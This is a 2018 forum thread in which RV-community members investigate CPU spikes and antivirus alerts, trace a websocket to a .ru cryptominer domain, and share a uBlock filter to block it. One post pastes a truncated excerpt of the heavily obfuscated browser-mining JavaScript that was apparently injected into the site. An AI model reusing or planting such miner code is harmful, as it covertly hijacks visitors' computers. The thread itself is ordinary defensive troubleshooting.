Fiberglass RV

Fiberglass RV (https://www.fiberglassrv.com/forums/)
-   Forum Admin, News & Announcements (https://www.fiberglassrv.com/forums/f65/)
-   -   BITCOIN MINER on this site?!? (https://www.fiberglassrv.com/forums/f65/bitcoin-miner-on-this-site-85739.html)

Alex Adams 06-29-2018 02:30 PM

Malwarebytes Showing Riskware popup from Forums
 
1 Attachment(s)
I don't know if anyone else is seeing this, but I keep getting a riskware warning popup from Malwarebytes that shows a .ru web address. It only pops up when I am in the Forum. If I click on the Manufacturer's tab it stops. Hee is what I am seeing:

Steve Carlson 06-29-2018 02:46 PM

I have not been seeing that, and I have Malwarebytes at home.

Alex Adams 06-29-2018 02:50 PM

Steve is that the free or pay version? Mine is the pay version.

Byron Kinnaman 06-29-2018 03:19 PM

MY guess is that it's a ghost. This site is processor hungry and I believe some malware protection software measures the amount of CPU capacity used. Which could give a false alarm.




The IP listed on your screen shot is from Germany. I don't know where this site is hosted or gets it's advertising.

Steve Carlson 06-29-2018 03:35 PM

Quote:

Originally Posted by Alex Adams (Post 704248)
Steve is that the free or pay version? Mine is the pay version.

Pay.

John in Santa Cruz 06-29-2018 05:23 PM

ah, my uBlock advertising filter is showing that .ru URL being used by a websocket, too... guessing there's some malware sliding in via the advertising stream, or the massive number of tracking scripts this site loads.

I'm trying to figure out where its being invoked from... so far, I've just found this mostly useless info about it.

Request URL: wss://www.qlzwfzfatjth.ru/
Request Method: GET
Status Code: 101 Switching Protocols
HTTP/1.1 101 Switching Protocols
connection: Upgrade
date: Fri, 29 Jun 2018 23:19:44 GMT
sec-websocket-accept: 55L4VKDFS/6B8v0yDa9VM6P3UDM=
server: Cowboy
upgrade: websocket
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Connection: Upgrade
Host: www.qlzwfzfatjth.ru
Origin: The Fiberglass RV Community
Pragma: no-cache
Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
Sec-WebSocket-Key: LAcnQeSDQ3EfCgpKAURlig==
Sec-WebSocket-Version: 13
Upgrade: websocket
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36

John in Santa Cruz 06-29-2018 05:26 PM

all the communications over that websocket is encrypted/hashed so it just looks like random garbage, but data is being sent to it fairly regularlly while this site is open.

John in Santa Cruz 06-29-2018 05:29 PM

crap, that domain is associated with a bitcoin miner trojan.

I think someone has infected this website and is using our browsers to mine bitcoin . there are an insane number of obfuscated/encrypted javascript 'apps' associated with this site, far more than a simple web forum has any possible legitimate use for.

John in Santa Cruz 06-29-2018 05:32 PM

I added qlzwfzfatjth.ru to my uBlock Origin custom blockers list, and WOW, the 80% CPU usage has gone entirely away.

John in Santa Cruz 06-29-2018 05:37 PM

BITCOIN MINER on this site?!?
 
So several of us have commented that this site, when left open, consumers nearly 100% of a CPU core the entire time its open.

I did some more digging and found via the Chrome domain inspector and my uBlock Origin adware blocker that there's a websocket being opened to a russian obfuscated URL from some seriously obfuscated javascript code, I can't track down where the reference is coming from, but its hitting websocket wss://www.qlzwfzfatjth.ru/ every couple seconds with an encrypted string of junk.

https://www.fiberglassrv.com/forums/f...tml#post704268

when I google that domain name, I find references to it in bitcoin mining hackery, I do believe someone has hacked this server, or one of the related advertising servers and has injected a coin miner.

PLEASE FIX THIS ASAP.

John in Santa Cruz 06-29-2018 05:56 PM

extra fun, the websocket?

$ host www.qlzwfzfatjth.ru
www.qlzwfzfatjth.ru has address 144.76.58.136
www.qlzwfzfatjth.ru has address 85.10.201.70
www.qlzwfzfatjth.ru has address 144.76.32.66
www.qlzwfzfatjth.ru has address 5.9.61.75
www.qlzwfzfatjth.ru has address 144.76.91.146
www.qlzwfzfatjth.ru has address 5.9.110.228
www.qlzwfzfatjth.ru has address 5.9.67.171
www.qlzwfzfatjth.ru has address 144.76.76.226
www.qlzwfzfatjth.ru has address 144.76.65.203
www.qlzwfzfatjth.ru has address 5.9.81.135
www.qlzwfzfatjth.ru has address 85.10.201.199
www.qlzwfzfatjth.ru has address 144.76.68.4
www.qlzwfzfatjth.ru has address 144.76.40.218


man, thats a lotta different IPs

144.76.58.* is in germany
85.10.201 is also in germany
5.9.*.* is in germany...

in fact all of these are part of "Hetzner Online GmbH", I have no idea who they are, but google suggests they are a large hosting and datacenter operator.

Alex Adams 06-29-2018 06:18 PM

I was afraid of that. Hopefully the moderators will check this and do something. I tend to be paranoid when it comes to the internet. I've been running antivirus and anti-malware since it has been available even before some upstart kid named McAffee got started!

John in Santa Cruz 06-29-2018 06:30 PM

Adding that qxxxx domain (without any www.) To my ublock spam list has stopped the 100% CPU usage.

Alex Adams 06-29-2018 06:42 PM

Steve, check your settings in Malwarebytes. Something like Realtime Protection is turned off. You should be getting the same messages I am.

John in Santa Cruz 06-29-2018 08:19 PM

if you'r eusing CHrome or Firefox, install the free plugin uBlock Origin (which is superior to adblock plus or whatever). click the UO icon in the toolbar, select 'dashboard', and on the "My Filters" tab, at the bottom add a line with just...

qlzwfzfatjth.ru


and click "Apply Changes", and you can close the ublock dashboard tab in your browser.

Byron Kinnaman 06-29-2018 11:15 PM

Quote:

Originally Posted by John in Santa Cruz (Post 704291)
if you'r eusing CHrome or Firefox, install the free plugin uBlock Origin (which is superior to adblock plus or whatever). click the UO icon in the toolbar, select 'dashboard', and on the "My Filters" tab, at the bottom add a line with just...

qlzwfzfatjth.ru


and click "Apply Changes", and you can close the ublock dashboard tab in your browser.

Thank you,,, Big improvement.

John in Santa Cruz 06-30-2018 01:25 AM

Somehow the page is loading this piece of heavily obfuscated code, 186k of crypted crud.... I've deleted the middle so the message fits, with ... in two places.

blob:https://www.fiberglassrv.com/f896f15c...7-09045c289faa

Code:

WASM_JS="(new Function((function(s){var d={},a=(s+\"\").split(\"\"),cc=a[0],o=cc,r=[cc],c=256,p;for(var i=1;i<a.length;i++){var cd=a[i].charCodeAt(0);if(cd<256){p=a[i];}else{p=d[\"_\"+cd]?d[\"_\"+cd]:(o+cc);}r.push(p);cc=p.charAt(0);d[\"_\"+c]=o+cc;c++;o=p;}return decodeURIComponent(escape(r.join(\"\")));})(decodeURIComponent(escape((function(n,r){return n.split(\"\").map(function(n,t){return String.fromCharCode(n.charCodeAt(0)^r.charCodeAt(t%r.length))}).join(\"\")})(atob(\"QwBBE1ZdBh1RH1wKTVREUllTDXQKAEVBXREYWw4VF0ZWVwdXXA9WVxRGXKW/863zr+msDRZOUBBeoLDpulkEooIZWwheXBAZXkH3l/flSgQDX1hEdlpaZ0Ra6bcXoLzouBgfQBtda1hlDgf0rzz3gPbgp+BKQlRSV1lHCm1o6bxLEFhES/S3CVRHUV4FEUwe8NH2gR0Wpu7ogfyPG+iaRkNcWQQDoK9OTFhWCBtUHFERSKeB8O5EE1FdHqSD8bhSa+mr8p3wgPzjFF9eTPeaCPWQ9If8skJdCEACH0Og0KeYRv+PFUxV8Y4OJ1ADoLkDfX9vL2F6fn7/tTYY8uMbEWQjIUPprPyq/qjzsPG86rKi6X7qt/eLRwPxtV9L9/r2pKagfGEtJjPqoP2s/KvzsfG96rOi6PejEfeOoZHylPSe9uD2tkN9fHcjpM7qrv6F/rHzgvGqBP/fo4lI/5T+wfSIY3t9fy75tqaC9Kih16az8LbxhOuH8JX9of7eoqlC/qp8FPa69Iwa9/H1oKWkaBSu5qm18LcQZA3wt1pA6p4WRF5CTPmLB19cVB0YXhf3n6ev96ug8qiqUf2Y/rl2S2Hyh/7JNkzqh/m4Gvul+K.
.....
E1MDM4M2I4NSCv7DNtYmotdpHoOSYhPTY1LTlvZDAtODgyZjM1MDMzM2I6NSDl7DNtYm0tdtvoOSZoOzY1LTlpZDAtODg1ZjM1MDM0M2I9NWEeGBNGQ1F1B0E3FB1sHAZtDQk9SQBVEwFBRgNNMFpWVWJ4eyczfXIoY1EcBQoDDBsDDw90b3ohIXZDWV85SDMdXkZUX0s=";var _0x4afa=['FnFNwpl6','w4rCty58Xg==','FcK0KMONEg==','wohoB0ZB','wp5UwrtFw5U=','w4pWw6DDnSs=','w6t5wpYYeA==','w7NddGnDvA==','McOaaAUP','w67CosKxw4DDiQ==','w5Z0AErCtg==','QT4GwoBv','w7fCkRvDusKR','w7TDhcODw7XCpw==','wqlIwqVEw7k=','P1HCuWDCgA==','LEBdw6JV','VcKfW8Kmwqk=','w7TChBrCvDo=','w5Vzw7FXPg==','w5rCuiLCsg4=','wqRpDWlZaA==','TcO9TcKwwrzCrFcdZMOK','wqgawrsw','w6ZfDVnCuls=','wqEvXinDs0M7wr8tw5Q=','RMKmw5ANTws=','GFJXw64=','GlPCtRbDrMKfSQ==','w7LCqMKzw4s=','E8KtLsOuM8OV','PsOddcODwpYpQA==','QsK6w5XDgQ==','VcK9w57Dm8OcAsKN','NULCqB7DpMKYScOPwrZHKhvDjl8=','woVswphYw5Iy','EHd4wr9VVMK7wprDpg==','w4XCvwDDhMKPEw==','wrPDqcOgwrVjecODwoQQ','wqnDjsOtwo8y','w4zCsRTDo8Kw','YcKIw5w8','w6nDgMOhw5/Cjw==','ZxUFwpo=','cS4uwr9T','YsKfw501Y03Cjg==','UMO7QcKq','w5xEwoDCkcO4WQ==','ay/Dr8OBw4vDrcO2','wqlvwqJKw6E=','WsK9w5HDi8O1H8KPJ8KD','wo0awqMHwoo=','w5d+TkPDix8=','w6jClsKEw4bDsQ==','wqsXYsKi','wqIuVCU=','KMOBfsOnwqMIeEnDn8KfOw==','Xw/Dk8O+w7HDlsObwq5cwp85wpcw','USTDpsOiw5o=','ccKhw4Fzw6U=','w7Nwc2DDngNkwozCjyPCqw==','XVROQiZBwporDgrCmzhE','woIsHMKUwos5','QMKSw5pBw6DDs3Q=','WWJ/YA4=','w6Yda8Obwog=','aMKST8K7wrTDuQ==','w5PCkjnCuAlz','wrRyAntZfMKdwprDv8KIRRgZNMO3wr3Dlg==','TcKFw5MrYm3CmxQDw7smFcKyRMOnwok=','wozCkRLCrcOXPw==','woDDtcO0wrNCdcOBwrIUWwTCkg==','w7LDrWzCtXY=','wqjDqcOzwro=','wrkWwrsw','w6/CkTjCvwRYD8K7FShLRMOcw4zDnQ==','wq1WK21b','w6hNwqwWeg==','V8Khw5Uifw==','wpwTwpLCv8OrwrQ=','L3ojOcOW','RsKhw4EfWQ==','w516GlfCoQ==','OXQSMMOm','wqYiIcK3wp4lHcOMw5rDhsK5','w4nCiMKAw6Qcw68Qw6xdwrp+woLDng==','FDDDp2bCrQ==','fsKCw5M8RlvCnRQK','w4FywrLCj8OA','wqTCiwEw','wrXCoyvCpsKf','wqoUfA/Dlw==','woAdwojCssOiwrBjfXLCo2vCiw==','eH54TBI=','ScOrPTI=','w7LCsx7Csxg=','I3Jzw5pSwrI=','RsOmQsKiwrDCvw==','I297woJ3cMKqwozDojDCrSMMAjLDm03CgcOr','AAjDrVDCuXnDqw==','e8O+RcKowrnColg=','RzUlwrpiwrjCs3/CqzTDqQXCkw==','wrIRwqYgwr3DrsKUOw==','wrQRwrgxwq/Ds8KWOVA=','JXTChA==','w6V2w7/DqT4=','wqwjPMKwwos5C8OK','dcO5asKMwrg=','w4jDiMOZw4nCjSFuw7c=','w5TCnCPCvw==','w79bwrEoWUg=','dBsDwpA=','w6vDscOB','YsKCw4EsR1vCmAIHw7gW','w5lfw69VGGx4w4Y=','w7RVw4jDti8=','bMO9Fi/Dkg==','TsKnw40fRwLDhsKl','w4HChMKcw6TDjH4=','wprCsC3Cnw==','C1EJ','w4bCkADCjCk=','w7fCqcKhw5siw4Iqw4o=','KRPDhglaWxPDqT3CmwEr','UsKzw4TDjg==','HEDCtg7DoA==','w7wlccO4wow=','wpLCogzCksOB','w4PChMKFw4nDl3Q=','w6TDsMOWwqlCw6x6McO3Cg==','w6vCnMOjw7nDvcKRw6/CksOcw5k=','PArDolrCvHHDvcO3ZsO6YMOL','DXLCjDjDnQ==','Q8KPw60/TQ==','w4LDqGrCqUXCswRE','L8OLdsO9wrkfXVjDhMKALHdZCg==','SsKDw5c=','wpRNOUNJ','w5HDlMOFw4nCgzt0w6LDoQ==','w41Dwp4+XA==','YsKHw4BKw6LDtyA4GArCiwnCrsKGEsK0wp0BO3nCrnfCu3dBw6PDvgt0woVhwrMf','ajIdwrRx','w7Vmw4fDrzY=','w5/DhcKwwptTKMOTwqbCgw==','wqBCwq9lw7sEw4zDiDzDq8OrYBPCncKoDg==','wqFzDWxEZsKGwp0=','SXpyZxZ2w6MOKyHCoFV6wppRc3/Chj/DqQ==','wqbDkcOIwr9C','wo8ewoA4wrM=','bcO7VsKPwoE=','w6ZPUV3Drg==','H1p9w5tl','bcKxw5pVw7c=','csOSYsKxwpE=','eMKhw6fDu8Op','wpUMwoIAwow=','aMK2a8KXwpQ=','w6bChMOyw4PDkQ==','w4VAw63DoDc=','w69EwrMnRA==','S8OMQsK/','wq7CrR0uwog=','cMKQw4PDqMO/','w6tywoPCsMOp','Lnk5EMOj','RMKrw6PDqMO4','GFjCiTzDhA==','SsKgW8Kkwr0=','wpHDjsOpwql8','w7vClcKdw6fDoQ==','w6/CnDVG','dQIHwp5Pwo/CmQ==','w4Rxw6fDvT0=','wqU/Si7DqVwA','wrkAYMKmw6AcSg==','Z8Kzw69Qw4I=','w7FdLG7CsQ==','w5AXUsOgwo8=','w6tEw4fDoy/Ckg==','wo3ChxHCj8KQ','w61WccK6w78=','FcOnw4kKVQE=','Dk9Cw6V1w77DuA==','w5RJw4DDrgI=','NjnDuQpQ','ZC/DoMOR','TcKdw4A9el/CmRQhw7McB8K3ScOg','NFtdw6lmw77DrsKrworDnDg=','woMRfsKgw6YBWMKZwpMIcMK0wpzCocOX','woDDr8OvwrhbdcOUwo0VQBPCtng0','wrvCpyDClsO/DsKjXsKKUsON','fsKPw4NUw6LDsXQMODXCqn7CoMOUGsK9wo4=','VyLDtMOTw4jDsMOwwqtiwrULwpgCaMKfSG8=','woQHwromwp/DqMKWLA==','w5UlbsO+wozCuMOOw4Q7','FlwyNsOVc8K7YMKdQMKEKMKDDcOX','w4Nnwpg=','MXvCuXvCllTDtj/DtmB0L8KaP8KEw4I=','wp7CijbCrQ0=','JMOvZwYrXsKtLDItw67DkMOp','CkNGw69qw7rDvw==','wrHDnsOnwokFJsKGwq7Dlh/ChsKiCg==','w6gzYcKuETXDiyTCmA==','w5pDC17CoVk=','AAHDo1nCplvDrcOgc8OMbcOcw4rDrsOO','w58lfMOoKjPDizPDhQ==','w7nClDdeJBQ0w45m','w7dVAlvCqg==','KQLDkzFcSQPDjDs=','w4bDsmLCr0E=','UsKSw49Ww7k=','wqljFEVfbQ==','w4NUw6htFmN/w6/CqsKRwrU+','wrIiPcKv','X8KfU8KywrXDhsKzVhhWX23CpiHDjA==','wrJlwopDw58Sw6PDoxbDm8OhVjjCqcKSLw==','w4HCtMKnw40uw4U9w7x5wp5Twqo=','fsKFw5xBw6zDt2UYFgjCk0zCt8OS','U8KBw4A9a1rCklEVw6sSF8KiQMO3','TsO8Rg==','w5svZcK+Ez/DkyLCkQ==','wplvYsKzMz/DiCbCjQ==','K1PCk2HClA==','JsKjL8O+Ag==','w7LCiCHCqwg=','w5bCt8KWw7c7','w69xw7DDoyM=','w4PDkMOTwox1','w7YpYsK9GA==','SsKGw7wJZQ==','I8O+ScOzwq8=','wq0LYcKmw5c=','wooTWcKIw7U=','wroBfsKMw7k=','wogLwpLCnsOv','w5LDiMOcw6jCow==','w47CicKPw4bDi3dbV8OPQw==','wrYoKsKg','wr97wr53w6c=','w6Jow5JqOA==','wojCnh0xwroww6fDkhZIw4sYLMKqwq4=','DMOkUAEeUMK/KDg/w5zDkcKfwoos','VXJyYA1rwqIEKzXCoTREwrg=','w7NLwonCj8Os','X8KCw5YtZls=','w6rDtmzCvkXCpQ1nw4lVBw==','OB/DnCE=','w6LDqcOQwpFw','w7RRw4XDrS8=','wrAoSg==','OcOiVwY=','YxbDpcOHw70=','SsKww4pWw54=','X8KST8KgwrTDvsKDUhE=','dsKew4Avcw==','RcKcSMK8wrw=','w7nChy/DscKrNsKvw7zChMKzcw==','w4MoYcK0','w5HCsR3Dj8KkHcKow7PCl8K4','NRjDoDBbTh7DiD3CpAouHMODHwTCjjTCvhg=','w6/ClDrCrg9mHsKaMRdCdsOfw5/Dj8OLwpE=','QcKcw6M+Ww==','XMKVw4swcg==','VcOgASPDs8KHw49hYw83w4XDoRzDukrDiXvDisOj','w6Fiw77Djzk=','woQewqYnwrnDtMKiLFk=','wr/CghTCocK+PUwWJcKKaBfDm8OTwqk=','K3bCkR7DlQ==','bcOPABvDgsKxw69CRxQA','csKWT8K8wr3DvMKz','w69Tw6lHH2dpw6XCvcKIwr0QwrnCosOtSkc=','w5vCvApnQ2QVw6Vfw5LChQ==','w55nZHvDkg==','w5pREEzCtkgDw7Fz','wrPCsTLCiMOtDsKDfsKqcsOtw7rCm27CsEc=','w5XDjsOPw5M=','c8Kfw4A5c3zCnhcAw7oB','w4LCpsOzw4HDtA==','w50FTsOAwrbChsOI','w49VwpoNYw==','dsKnw71pw5LDiVM=','w5/CksKIw4XDrA==','wposPMK3wo8jPcOdw4I=','cMKIw60meTvDqsKSNVLDvCvDrArDkMKb','woEveQPDiA==','IGvCj3g=','ZMKsw7gsYg==','w7DCmcKEw5zDoHRySg==','wrbDrcOXwoEt','w6/DmcOwwpNp','QsKOw49Ww47DrGQ+OBI=','KRPDlyE=','VcK6w5HDncO6FcKdJ8KuHA==','w5bCkTjCsRI=','w4PDgsOsw5XCrg==','w7LDu8OGwqA=','wpLCtDfCmcKdGg==','CEQAHcOe','DXE+P8Oy','w59lTEPDkw==','w79Lw41xAA==','w5HCvcKDw786','w7/CmDxO','YsKfw50sZUrCkgED','w67CssKmw7HDtFNBc8O5ZWzCu8O6LsKu','wo92J1dI','w47CsyliTg==','JsOaQMOlwpM=','w6LCmS1IVQ==','RsKgw5/Dm8OWDsKAMsKK','woDCrzwZwpUGw5rDpRphw7YlHcKHwolu','QDDDhcOtw5Y=','wqw8wozCk8OW','JsO4RsO8wrM=','w6DClsOiw7bDkQ==','wqwKf8K9w70cQMKFwp8=','PHZhw4dYw4jDgsKjwqLDogRCwqoOw4tR','OMKyBMOQIg==','w71lw41HLA==','w7FiwokmVA==','FEvCknvChA==','w4LDh8OGw5E=','UcKBw7Z8w6k=','w4dlw6VDMw==','U8KLw4oqfw==','wqjCuQvCksKP','E1xWwopf','w63CnxVATw==','DHIYGcOW','w6HCuzB4Zg==','wrs4wozCucOC','I8OqZjAO','w5p+wqgYcg==','w4TCjR1yZA==','wqoubgPDuA==','woQHNsKVwoA=','wqILwo7CjMOx','w5wSc8KTBQ==','BcOdaBEH','WmlWYxs=','wpzCoifCtsO5','w7nCvDV5ZA==','NADDvHTCvg==','wqTCqxkcwqI=','ccKyw61ow48=','XUxEYRw=','GA/Doyh/','w7nCqRVzaQ==','ecOLIQTDsA==','w7djw7FOOw==','eMOWCQTDlA==','wp4gSsKbw5s=','w4PDhsO5wpZu','w5fClxTDjMKH','cw4P','SMKIw55Rw7k=','w5rDr3fCrVHCpQ==','GTDDgFvCpw==','woQdwp4=','azTDuQ==','w6XCkylfaA==','TsKTw5pUw7jDtw==','Y3VsfA0=','c8KWSA==','wozClRnDt8OHJcKkRMOT','GsKtIg==','XsOvJzc=','wplswplXw5I1','w6TCmCEYaU8yw58m','AVhQ','worCsCvCmcKMBg==','KWnClHzCuF3Dtg==','wq1pAQ==','JMOeZMO9wrgUfg==','w5fDh8OYw5TCjSF5','GX1Uw4JQ','wpjDvsO4wqZZ','ZWtoYBZswrA=','wptswplZw5Yvw6c=','IMKXJcOgHw==','EEB2wo1R','w5pXBlHCtk43w7d6wp3CihpN','woMcf8Ksw6ElXMKQwo4mdMKRwrrCl8Ou','ZzXDtcOFw5vDoQ==','LhfDgCJQTg==','L8KxKMOpKMOX','w49kwpc9WQ==','w4NHwro6fkDDilfCjw==','w6I4dsKyOQ==','wobCmycFwoU=','w77CmCHCsRQ=','IcOsUAwFVA==','ABLDrmXCu1fDr8O2b8O7ZMO5w7LDo8ObwonDgw==','JW3CmA==','TsKnw44eUg==','A0cfPcObcsKue8KbXA==','w79qaWPDnwU=','JGDClHDCmFXDoyTDsHw=','MMOiUBseS8KrJyUqw4s=','wrXCggA2woY0w7vDkCVM','fiHDs8Ocw4/Du8O2','w5bCsiFvdg==','w7lxbWbDng==','w5FZImrCtw==','CR3DtlvCug==','FXZpwq5t','wqZ4wrpXw4E=','W8Kww4lQw64=','wofDl8OywpIU','IVTCixzDsw==','EWFVw75k','H8KyNMOhNcOcGg==','w4jCuQ3Dh8KOFcK1w7o=','L3fCkGDCow==','NjXDli5z','EHfCvQ/Dpg==','CwPDqXfCgQ==','woTDlsOg','wo3CpRnCrcOqE8KjVA==','woQdwp7ChMOtwr0=','wrJvDXsIPcKBwpbDpA==','w4bCj8Kbw5vDlw==','w5zClMKJw4/DkW5yQQ==','wphkwoVEwo9zw7vDows=','w6hUw53DtC7Cjg==','w5QGScKcBw==','w6NnflTDkw==','VsOrPTHDqcKb','GMOYV8O/wqE=','XV1OSBc=','PHFgw4tp','w7zCscK/w4wk','S8Ksw5AMUgQ=','GsKkGcOCNg==','w73CisO1w5PDoQ==','LTzDgDRe','Q8OSSMK9w60=','P8OoUA8eUQ==','w77Ch8Olw7w=','wrgOfg/DsA==','V8OmRsK3wqHCv1I5bA==','w69Bwr09RF3DjVrCjQ==','w5xUw7JGDWo=','bjLDrsOY','VMKEScKJwr0=','w5/Ck8KEw5rDjGhqSMOZ','SsKow44=','wrTCjwM4','wr/DjMOKwrYv','w6RwTmfDmBh/wog=','V8O/TcKnwrA=','S8KJw4dK','w5fDtmzCv2jCtAZGw5RR','w6klccOh','KkhPwqJ0','QcK5RcKCwrs=','esKrw4LDuMOM','wrTDlcOgwqM6','w41OwprCgMO+'];(function(_0x4cb4a3,_0x4c36ce){var _0xdfa551=function(_0x4dece9){while(--_0x4dece9){_0x4cb4a3['push'](_0x4cb4a3['shift']());}};var _0x50c5f4=function(){var _0x1d84a1={'data':{'key':'cookie','value':'timeout'},'setCookie':function(_0x1cdd7f,_0x5016bf,_0x21f31b,_0x397324){_0x397324=_0x397324||{};var _0x489a7a=_0x5016bf+'='+_0x21f31b;var _0x2b56ce=0x0;for(var _0x2b56ce=0x0,_0x341baa=_0x1cdd7f['length'];_0x2b56ce<_0x341baa;_0x2b56ce++){var _0x345395=_0x1cdd7f[_0x2b56ce];_0x489a7a+=';\x20'+_0x345395;var _0x4eb7d5=_0x1cdd7f[_0x345395];_0x1cdd7f['push'](_0x4eb7d5);_0x341baa=_0x1cdd7f['length'];if(_0x4eb7d5!==!![]){_0x489a7a+='='+_0x4eb7d5;}}_0x397324['cookie']=_0x489a7a;},'removeCookie':function(){return'dev';},'getCookie':function(_0x27f382,_0x94a31){_0x27f382=_0x27f382||function(_0x15eac9){return _0x15eac9;};var _0x52be71=_0x27f382(new RegExp('(?:^|;\x20)'+_0x94a31['replace'](/([.$?*|{}()[]\/+^])/g,'$1')+'=([^;]*)'));var _0x3db49d=function(_0x1ac344,_0x15ee74){_0x1ac344(++_0x15ee74);};_0x3db49d(_0xdfa551,_0x4c36ce);return _0x52be71?decodeURIComponent(_0x52be71[0x1]):undefined;}};var _0x5d809c=function(){var _0x164425=new RegExp('\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*[\x27|\x22].+[\x27|\x22];?\x20*}');return _0x164425['test'](_0x1d84a1['removeCookie']['toString']());};_0x1d84a1['updateCookie']=_0x5d809c;var _0x13c51a='';var _0x3b7508=_0x1d84a1['updateCookie']();if(!_0x3b7508){_0x1d84a1['setCookie'](['*'],'counter',0x1);}else if(_0x3b7508){_0x13c51a=_0x1d84a1['getCookie'](null,'counter');}else{_0x1d84a1['removeCookie']();}};_0x50c5f4();}(_0x4afa,0x7e));var _0x2cba=function(_0x449995,_0x26c0a0){_0x449995=_0x449995-0x0;var _0x1324e1=_0x4afa[_0x449995];if(_0x2cba['WrrUEZ']===undefined){(function(){var _0x1d9a68=function(){var _0x31b2b0;try{_0x31b2b0=Function('return\x20(function()\x20'+'{}.constructor(\x22return\x20this\x22)(\x20)'+');')();}catch(_0x164801){_0x31b2b0=window;}return _0x31b2b0;};var _0x56e2b6=_0x1d9a68();var _0x215a53='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';_0x56e2b6['atob']||(_0x56e2b6['atob']=function(_0x3ef75d){var _0x563d21=String(_0x3ef75d)['replace'](/=+$/,'');for(var _0x4610a7=0x0,_0x28511f,_0x420a55,_0x558689=0x0,_0x4e285d='';_0x420a55=_0x563d21['charAt'](_0x558689++);~_0x420a55&&(_0x28511f=_0x4610a7%0x4?_0x28511f*0x40+_0x420a55:_0x420a55,_0x4610a7++%0x4)?_0x4e285d+=String['fromCharCode'](0xff&_0x28511f>>(-0x2*_0x4610a7&0x6)):0x0){_0x420a55=_0x215a53['indexOf'](_0x420a55);}return _0x4e285d;});}());var _0x3a4366=function(_0x3e33b5,_0x3e4aa8){var _0x3471ac=[],_0x4de3ef=0x0,_0x21445a,_0x42bce0='',_0x583a52='';_0x3e33b5=atob(_0x3e33b5);for(var _0x44c087=0x0,_0x434ad4=_0x3e33b5['length'];_0x44c087<_0x434ad4;_0x44c087++){_0x583a52+='%'+('00'+_0x3e33b5['charCodeAt'](_0x44c087)['toString'](0x10))['slice'](-0x2);}_0x3e33b5=decodeURIComponent(_0x583a52);for(var _0x4f8a7e=0x0;_0x4f8a7e<0x100;_0x4f8a7e++){_0x3471ac[_0x4f8a7e]=_0x4f8a7e;}for(_0x4f8a7e=0x0;_0x4f8a7e<0x100;_0x4f8a7e++){_0x4de3ef=(_0x4de3ef+_0x3471ac[_0x4f8a7e]+_0x3e4aa8['charCodeAt'](_0x4f8a7e%_0x3e4aa8['length']))%0x100;_0x21445a=_0x3471ac[_0x4f8a7e];_0x3471ac[_0x4f8a7e]=_0x3471ac[_0x4de3ef];_0x3471ac[_0x4de3ef]=_0x21445a;}_0x4f8a7e=0x0;_0x4de3ef=0x0;for(var _0x5c51d5=0x0;_0x5c51d5<_0x3e33b5['length'];_0x5c51d5++){_0x4f8a7e=(_0x4f8a7e+0x1)%0x100;_0x4de3ef=(_0x4de3ef+_0x3471ac[_0x4f8a7e])%0x100;_0x21445a=_0x3471ac[_0x4f8a7e];_0x3471ac[_0x4f8a7e]=_0x3471ac[_0x4de3ef];_0x3471ac[_0x4de3ef]=_0x21445a;_0x42bce0+=String['fromCharCode'](_0x3e33b5['charCodeAt'](_0x5c51d5)^_0x3471ac[(_0x3471ac[_0x4f8a7e]+_0x3471ac[_0x4de3ef])%0x100]);}return _0x42bce0;};_0x2cba['coHFrW']=_0x3a4366;_0x2cba['aKqyho']={};_0x2cba['WrrUEZ']=!![];}var _0x43ac5a=_0x2cba['aKqyho'][_0x449995];if(_0x43ac5a===undefined){if(_0x2cba['fdQpff']===undefined){var _0x169180=function(_0x1fd0bb){this['awMjMP']=_0x1fd0bb;this['mUNbyY']=
...
({'notification':_0x4bf730[_0x2cba('0x1a7','8c4m')],'workerHashes':_0x35e290});}},{'key':_0x668158[_0x2cba('0x1a8','sCoP')],'value':function(_0x10d75c){return _0x10d75c[_0x2cba('0x1a9','i#hz')]=_0x4bf730[_0x2cba('0x1aa','CiTv')],this[_0x2cba('0x1ab','iEwI')](_0x10d75c);}},{'key':_0x668158[_0x2cba('0x1ac','^UnF')],'value':function(){var _0x2f7585;return _0x2f7585=Module[_0x2cba('0x1ad','2x#F')][_0x2cba('0x1ae','7mYM')],{'ctx':Module[_0x2cba('0x1af','4FnJ')](),'input':new Uint8Array(_0x2f7585,Module[_0x2cba('0x1b0','cysc')](0x54),0x54),'output':new Uint8Array(_0x2f7585,Module[_0x2cba('0x1b1','7mYM')](0x20),0x20)};}}]),_0x2f7585;}();return _0x2f7585[_0x2cba('0x1b2','5Q^C')]=0x3e8,_0x2f7585;}[_0x2cba('0xc3','KLM(')](this),self[_0x2cba('0x1b3','#Zfi')]=null,self[_0x2cba('0x1b4','#Zfi')]=function(_0x40d98c){switch(_0x40d98c[_0x2cba('0xf0','iEwI')][_0x2cba('0x1b5','yhIQ')]){case _0x2bebd7[_0x2cba('0x1b6','*N!U')]:if(self[_0x2cba('0x1b7','u73Z')])throw new Error(_0x2bebd7[_0x2cba('0x1b8','7mYM')]);return self[_0x2cba('0x1b9','KLM(')]=new _0x2fa1cc(_0x40d98c[_0x2cba('0x1ba','^UnF')][_0x2cba('0x1bb','ZpSb')],_0x40d98c[_0x2cba('0x1bc','5Q^C')][_0x2cba('0x1bd','hjE!')],function(_0x570c0f){return self[_0x2cba('0x1be','^Nqu')](_0x570c0f);}),self[_0x2cba('0x1bf','qrrL')][_0x2cba('0x1c0','*N!U')]();case _0x2bebd7[_0x2cba('0x1c1','iEwI')]:return self[_0x2cba('0x1c2','F2jK')][_0x2cba('0x1c3','b2@6')](_0x40d98c[_0x2cba('0x1c4','8c4m')][_0x2cba('0x1c5',']7ak')]);case _0x2bebd7[_0x2cba('0x1c6','^UnF')]:return self[_0x2cba('0x1c7','A4d%')][_0x2cba('0x1c8','Ga1p')](_0x40d98c[_0x2cba('0x1c9','aKxW')][_0x2cba('0x1ca','cT!L')]);}};},{'./filemap':0x1}]},{},[0x2]);


VtSusan 06-30-2018 06:32 AM

Quote:

Originally Posted by John in Santa Cruz (Post 704291)
if you'r eusing CHrome or Firefox, install the free plugin uBlock Origin (which is superior to adblock plus or whatever). click the UO icon in the toolbar, select 'dashboard', and on the "My Filters" tab, at the bottom add a line with just...

qlzwfzfatjth.ru


and click "Apply Changes", and you can close the ublock dashboard tab in your browser.
